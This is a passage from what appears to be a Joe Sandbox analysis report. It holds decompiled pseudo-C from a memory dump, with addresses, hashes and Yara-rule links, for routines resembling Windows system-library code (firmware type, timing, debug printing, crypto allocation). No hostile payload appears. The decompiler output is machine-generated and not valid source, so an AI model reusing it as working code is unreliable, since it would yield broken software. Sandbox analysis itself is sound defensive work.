				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x46c05f0);
				E0463D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E045FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E046653CA(0);
						return E0463D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0462F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04603690(1, _t117, 0x45c1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0462AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04604620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0462AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0466500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04629860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x046651be
0x046651c3
0x046651c8
0x046651cd
0x046651d0
0x046651d3
0x046651d8
0x046651db
0x046651de
0x046651e0
0x046651e3
0x046651e6
0x046651e8
0x04665342
0x04665351
0x04665356
0x0466535a
0x04665360
0x04665363
0x04665366
0x04665369
0x04665369
0x0466536b
0x0466536b
0x04665370
0x046653a3
0x046653a4
0x046653a6
0x046653ab
0x046653ab
0x046653ae
0x046653ae
0x046653b5
0x046653bf
0x046653bf
0x04665375
0x04665396
0x046653a0
0x046653a0
0x00000000
0x04665396
0x04665377
0x04665379
0x0466537f
0x0466538c
0x04665390
0x00000000
0x04665390
0x046651ee
0x046651f1
0x04665301
0x04665310
0x04665315
0x04665318
0x0466531b
0x04665320
0x0466532e
0x04665331
0x00000000
0x04665331
0x04665328
0x04665329
0x00000000
0x04665329
0x046651fa
0x04665235
0x04665236
0x04665239
0x0466523f
0x04665240
0x04665241
0x04665242
0x04665246
0x04665247
0x0466524e
0x04665251
0x04665267
0x04665269
0x0466526e
0x0466527d
0x0466527e
0x04665281
0x04665282
0x04665287
0x04665288
0x0466528a
0x0466528f
0x04665294
0x00000000
0x00000000
0x0466529a
0x0466529c
0x0466529e
0x0466529e
0x046652a4
0x046652b0
0x00000000
0x00000000
0x046652ba
0x046652bc
0x046652bc
0x046652d4
0x046652d9
0x046652dc
0x046652e1
0x00000000
0x00000000
0x046652e7
0x046652f4
0x00000000
0x046652f4
0x04665270
0x00000000
0x04665270
0x046651fc
0x046651fd
0x04665202
0x04665203
0x04665205
0x0466520a
0x0466520f
0x00000000
0x00000000
0x0466521b
0x04665226
0x0466522b
0x0466521d
0x0466521d
0x04665222
0x04665222
0x0466522d
0x00000000

Strings

Legacy, xrefs: 04665226
UEFI, xrefs: 0466521D

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 1643c0fedb7a2e918ed7786f49d686ff718b69162c54466cf13ac5834d488405
Instruction ID: fb3d6ba9fa24ba401d0361dbe6722ccf479f11ef89c223b564b15e563eca8634
Opcode Fuzzy Hash: 1643c0fedb7a2e918ed7786f49d686ff718b69162c54466cf13ac5834d488405
Instruction Fuzzy Hash: 3C516D71E00719AFDB24DFA8D981AAEBBF8FF48704F54402DE54AEB251F671A901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0460B944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0460B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x46dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04607D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E046B8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04629E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0462B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0462CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04607D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E046B8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0462AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x46d8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x46d862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x46d8628; // 0x0
							_t116 =  *0x46d862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0460b94c
0x0460b956
0x0460b95c
0x0460b95e
0x0460b964
0x0460b969
0x0460b96d
0x0460b96d
0x0460b970
0x0460b974
0x0460b97a
0x0460badf
0x0460badf
0x0460bae2
0x0460bae4
0x0460bae6
0x0460baf0
0x04652cb8
0x0460baf6
0x0460baf6
0x0460baf6
0x0460bafd
0x0460bb1f
0x0460bb1f
0x0460baff
0x0460bb00
0x0460bb00
0x0460bb03
0x0460bb03
0x0460bacb
0x0460bacf
0x0460bad0
0x0460bad1
0x0460badc
0x0460badc
0x0460b980
0x0460b980
0x0460b988
0x0460b98b
0x0460b98d
0x0460b990
0x0460b993
0x0460b999
0x0460b99b
0x0460b9a1
0x0460b9a5
0x0460b9aa
0x0460b9b0
0x0460b9bb
0x0460b9c0
0x0460b9c3
0x0460b9ca
0x0460b9cc
0x0460b9cf
0x0460b9d3
0x0460b9d7
0x0460ba94
0x0460ba94
0x0460ba98
0x0460baa3
0x04652ccb
0x0460baa9
0x0460baa9
0x0460baa9
0x0460bab1
0x04652cd5
0x04652cdd
0x04652cdd
0x0460babb
0x0460babc
0x0460bac2
0x0460bac3
0x0460bac3
0x0460bac6
0x00000000
0x0460b9dd
0x0460b9dd
0x0460b9e7
0x0460b9e7
0x0460b9ec
0x0460b9ec
0x0460b9f1
0x0460b9f5
0x0460b9fa
0x0460ba00
0x0460ba0c
0x0460ba10
0x0460ba10
0x0460ba12
0x0460ba18
0x00000000
0x00000000
0x0460bb26
0x0460bb26
0x0460ba1e
0x0460ba1e
0x0460ba23
0x0460ba25
0x0460ba2c
0x0460ba30
0x0460ba35
0x0460ba35
0x0460ba41
0x0460ba46
0x0460ba4c
0x0460ba50
0x0460ba54
0x0460ba6a
0x0460ba6e
0x0460ba70
0x0460ba74
0x0460ba78
0x0460ba7a
0x0460ba7c
0x0460ba8e
0x0460ba90
0x0460ba92
0x0460bb14
0x0460bb14
0x0460bb16
0x0460bb16
0x00000000
0x0460ba7c
0x0460bb0a
0x0460bb0d
0x00000000
0x00000000
0x00000000
0x0460bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0460B9A5

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 28b4395bac268eca5f710d1de32d51474b7ed51637f5aa7afbc836b98aa48bbe
Instruction ID: 5aa7ad51d567d48a164322e13e70e2bbc669e0477efcef52c0d4d1012f6fa027
Opcode Fuzzy Hash: 28b4395bac268eca5f710d1de32d51474b7ed51637f5aa7afbc836b98aa48bbe
Instruction Fuzzy Hash: A5514771A08341CFC724DFA9C48092BBBE5FB88A14F14C96EE99587395E730F844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 045EB171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E045EB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x46bf7a8);
				E0463D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0463D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0462D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0462F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0463DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0462B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0462B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0462E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0462A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x045eb171
0x045eb171
0x045eb171
0x045eb171
0x045eb171
0x045eb176
0x045eb17b
0x045eb180
0x045eb186
0x045eb18f
0x045eb198
0x045eb1a4
0x045eb1aa
0x04644802
0x04644802
0x04644805
0x0464480c
0x0464480e
0x045eb1d1
0x045eb1d3
0x045eb1de
0x045eb1de
0x04644817
0x0464481e
0x04644820
0x04644822
0x04644822
0x04644824
0x04644824
0x0464482a
0x00000000
0x00000000
0x04644835
0x0464483a
0x0464483d
0x0464483f
0x04644842
0x04644842
0x04644842
0x04644846
0x0464484c
0x0464484e
0x04644851
0x04644851
0x04644853
0x04644854
0x04644854
0x04644858
0x0464485a
0x0464485a
0x0464485d
0x0464485f
0x04644861
0x04644861
0x04644866
0x0464486b
0x0464486e
0x04644871
0x04644876
0x04644876
0x04644878
0x0464487b
0x04644884
0x04644884
0x00000000
0x0464487d
0x0464487d
0x04644882
0x04644889
0x04644889
0x0464488f
0x04644891
0x046448e0
0x046448e2
0x046448e4
0x046448e4
0x046448e7
0x046448e7
0x046448ed
0x046448f4
0x046448f6
0x04644951
0x04644951
0x04644953
0x04644953
0x04644956
0x04644956
0x04644958
0x04644959
0x04644959
0x0464495d
0x0464495d
0x0464495f
0x0464495f
0x04644965
0x04644969
0x046449ba
0x046449ba
0x046449c1
0x046449c5
0x046449cc
0x046449d4
0x046449d7
0x046449da
0x046449e4
0x046449e5
0x046449f3
0x04644a02
0x00000000
0x04644a02
0x04644972
0x04644974
0x00000000
0x00000000
0x04644976
0x04644979
0x04644982
0x04644983
0x04644984
0x0464498b
0x0464498d
0x04644991
0x04644993
0x04644999
0x0464499d
0x046449a2
0x046449a2
0x046449a2
0x04644999
0x046449ac
0x00000000
0x046449b3
0x046448f8
0x046448fe
0x00000000
0x00000000
0x00000000
0x046448fe
0x04644895
0x0464489c
0x046448ad
0x046448b2
0x046448b5
0x046448b7
0x046448ba
0x046448bc
0x046448c6
0x046448c6
0x046448cb
0x046448d1
0x046448d4
0x046448d8
0x046448d8
0x00000000
0x046448d8
0x046448be
0x046448c0
0x00000000
0x00000000
0x046448c2
0x00000000
0x00000000
0x00000000
0x046448c4
0x00000000
0x04644882
0x0464487b
0x04644904
0x04644906
0x00000000
0x00000000
0x04644908
0x0464490e
0x00000000
0x00000000
0x04644910
0x04644917
0x04644917
0x00000000
0x04644917
0x045eb1ba
0x046447f9
0x046447fc
0x00000000
0x00000000
0x00000000
0x046447fc
0x045eb1c0
0x045eb1c0
0x045eb1c3
0x045eb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 046448AD

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 482eecccd258373ce8848a472a9042ea5621bbf6848c430afe0e16fe9b8f5e74
Instruction ID: 460c5a845db8c22c16531ba4d869475841ee53ab6a0e86f0418abfc372057cfa
Opcode Fuzzy Hash: 482eecccd258373ce8848a472a9042ea5621bbf6848c430afe0e16fe9b8f5e74
Instruction Fuzzy Hash: DD51C171D002598EEF34CF648946BAEBBB1BF40725F1041ADD859AB281EB71A941DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04612581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E04612581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				void* _t244;
				void* _t246;
				signed int _t248;
				signed int _t249;
				void* _t251;
				signed int _t258;
				signed int _t260;
				intOrPtr _t262;
				signed int _t265;
				signed int _t272;
				signed int _t275;
				signed int _t283;
				intOrPtr _t289;
				signed int _t291;
				signed int _t293;
				void* _t295;
				signed int _t296;
				unsigned int _t299;
				signed int _t303;
				void* _t304;
				signed int _t305;
				signed int _t309;
				intOrPtr _t321;
				signed int _t330;
				signed int _t332;
				signed int _t333;
				signed int _t337;
				signed int _t338;
				void* _t340;
				signed int _t341;
				signed int _t343;
				signed int _t346;
				void* _t347;
				void* _t349;

				_t343 = _t346;
				_t347 = _t346 - 0x4c;
				_v8 =  *0x46dd360 ^ _t343;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t337 = 0x46db2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t299 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t349 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t289 = 0x48;
				_t319 = 0 | _t349 == 0x00000000;
				_t330 = 0;
				_v37 = _t349 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t289 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t338 = 0xc0000106;
						goto L32;
					} else {
						_t337 = L04604620(_t299,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t289);
						_v52 = _t337;
						__eflags = _t337;
						if(_t337 == 0) {
							_t338 = 0xc0000017;
							goto L32;
						} else {
							 *(_t337 + 0x44) =  *(_t337 + 0x44) & 0x00000000;
							_t50 = _t337 + 0x48; // 0x48
							_t332 = _t50;
							_t319 = _v32;
							 *((intOrPtr*)(_t337 + 0x3c)) = _t289;
							_t291 = 0;
							 *((short*)(_t337 + 0x30)) = _v48;
							__eflags = _t319;
							if(_t319 != 0) {
								 *(_t337 + 0x18) = _t332;
								__eflags = _t319 - 0x46d8478;
								 *_t337 = ((0 | _t319 == 0x046d8478) - 0x00000001 & 0xfffffffb) + 7;
								E0462F3E0(_t332,  *((intOrPtr*)(_t319 + 4)),  *_t319 & 0x0000ffff);
								_t319 = _v32;
								_t347 = _t347 + 0xc;
								_t291 = 1;
								__eflags = _a8;
								_t332 = _t332 + (( *_t319 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t283 = E046739F2(_t332);
									_t319 = _v32;
									_t332 = _t283;
								}
							}
							_t303 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t338 = _v68;
								__eflags = 0;
								 *((short*)(_t332 - 2)) = 0;
								goto L32;
							} else {
								_t293 = _t337 + _t291 * 4;
								_v56 = _t293;
								do {
									__eflags = _t319;
									if(_t319 != 0) {
										_t239 =  *(_v60 + _t303 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t293 =  *(_v60 + _t303 * 4);
										 *(_t293 + 0x18) = _t332;
										_t243 =  *(_v60 + _t303 * 4);
										__eflags = _t243 - 8;
										if(_t243 > 8) {
											goto L56;
										} else {
